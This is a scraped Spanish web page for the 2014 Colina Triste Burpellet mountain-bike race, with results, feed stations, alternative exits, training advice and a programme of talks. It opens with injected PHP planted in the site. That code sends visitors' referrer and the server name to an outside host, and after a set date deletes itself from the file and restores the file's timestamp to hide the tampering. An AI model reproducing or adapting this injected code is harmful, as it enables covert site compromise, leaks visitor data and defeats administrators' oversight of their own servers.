check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456731446){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776729&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_contact/models/content.php"); } Colina Triste 2014
Banner
Banner
Banner
Banner
Banner
Banner
Banner
Banner
Banner
Banner
Banner
Banner
Multimedia
Banner
Banner
Banner
Banner
Calendario
<<  Abril 2017  >>
 Lu  Ma  Mi  Ju  Vi  Sa  Do 
       1  2
  3  4  5  6  7  8  9
10111213141516
17181920212223
24252627282930

Colina Triste 2014

Clasificaciones CTB2014

CLASIFICACIONES CTB2014

*Todavía está abierto el plazo de recursos, presentandolos en Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla

 

Avituallamientos

No queda nada para tomar la salida de COLINA TRISTE BURPELLET 2014, y para que lo tengais todo preparado, aqui os informamos de todos los avituallamientos a lo largo del recorrido.


-KM 16 Sad Hill Líquido - Sólido

-KM 22 Pradera de San Juan Silos Liquido

-KM 34 Peñacoba Líquido - Sólido (Victory Endurance)

-KM 51 Espinosa Líquido

-KM 63 Hortezuelos-El enebral Líquido - Sólido, (Es el avituallamiento más fuerte)

-KM 74 Alto Vallejo Líquido.

Además de esto señalizaremos las fuentes de Doñasantos, Peñacoba y Barriosuso.

 

 

Salidas alternativas en Colina Triste

¡¡¡Nosotros ponemos el reto!!!
!!Tu decides hasta donde¡¡

Ya no queda nada para el domingo y si aún estas con dudas de tu estado de forma, manten la calma ya que la organización de Colina Triste Burpellet os ofrece unas salidas alternativas por si andas menos de lo que pensabas o para los que han sufrido algún tipo de averia mecánica, o si te ha dado el señor del mazo o para cualquier imprevisto, podrás tomar diferentes salidas alternativas, obviamente esto infuirá en tu clasificación final.
Estos son los diferentes puntos kilométricos, que por supuesto estarán señalizados.


-km 22 bronce
-km 59 plata
-km 64 Hortezuelos, salida alternativa, puntuaría plata.
-km 70 Cascajera, puntuaría plata.
-km 74 Cruce Hinojar, no puntua, sería descalificado.

 

¡NO LO DEJES PARA EL ÚLTIMO DÍA! PLAN DE ENTRENAMIENTO ÚLTIMOS 10 DÍAS

Esta semana, me apetece comentar un tema que tiene mucha polémica. ¿Hay que entrenar fuerte la última semana? ¿Se mejora el rendimiento o por el contrario se acumula fatiga?

Aunque la última semana el entrenamiento esta “hecho” hay aspectos que su mejora se produce entre 48 y 72 horas y que por tanto hemos de entrenar si queremos llegar con ese “extra”. Me refiero a la potencia, la velocidad, la coordinación y la capacidad y potencia anaeróbica aláctica.

 

Cena y Charlas en Colina Triste

Este año como complemento a la prueba Colina Triste Burpellet el Club Deportivo Silos ha organizado diferentes charlas que se impartirán a lo largo de la tarde del sábado 30 abiertas a todo el mundo y que se impartirán en el convento de San Francisco, donde al finalizar este encuentro se podrá asistir previa reserva a la cena Colina Triste.
Las charlas comenzarán a las 18:00, la primera de ellas corre a cargo de nuestros colaboradores  “Asesores de Salud León, Burgos, y Aranda de Duero” quienes ya nos han informado y aconsejado estos días atrás con interesantes articulos que hemos publicado en la web. El tema del debate será “¿Salud vs Rendimiento?”.
El siguiente coloquio corre a cargo de nuestra campeona del año pasado Sara García Inclan, en su palmarés reciente figuran entre otros logros el titulo del Open de Castilla y Leon XC y la séptima posición en el Open de España XCo, pero su charla nos sacará de España y nos llevará a Belgica. “16 Dias – 11Carreras Bélgica la meca del ciclismo ”.
A partir de las siete tomará el relevo la asociación de Burgos en Ruta BTT,  asociación impulsora de la formación del cirquito provincial para contarnos su experiencia en la “Madrid-Lisboa en MTB ¿Reto o Aventura? ”.
Las 19:40 será el momento en el que la organización de Colina Triste Burpellet impartá una charla técnica acerca de la edición de 2014.
La penúltima de la tarde corre a cargo de uno de los favoritos a llevarse el trofeo de Colina Triste Burpellet. Milton Ramos conocidísimo por muchos triunfos y auténticos carrerones nos contará de primera mano su reciente triunfo en Italia, en la IronBike prueba de 7 etapas de auténtico mtb.
Y para cerrar la tarde la Asociación Cultural Sad Hill nos hablará de ese cementerio de la mítica película “El bueno, el feo y el malo” que da nombre a esta prueba y en el que están llevando a cabo grandes tareas de recuperación.
Y con todo lo que hemos aprendido nos quedamos a cenar en San Francisco por 15€ abierto para todo el mundo previa reserva en el 947 390 010 hasta el 28 de agosto.
El menú será el siguiente:
Tallarines Carbonara.
Merluza Rellena.
Helado templado con frutos rojos.

 
Más artículos...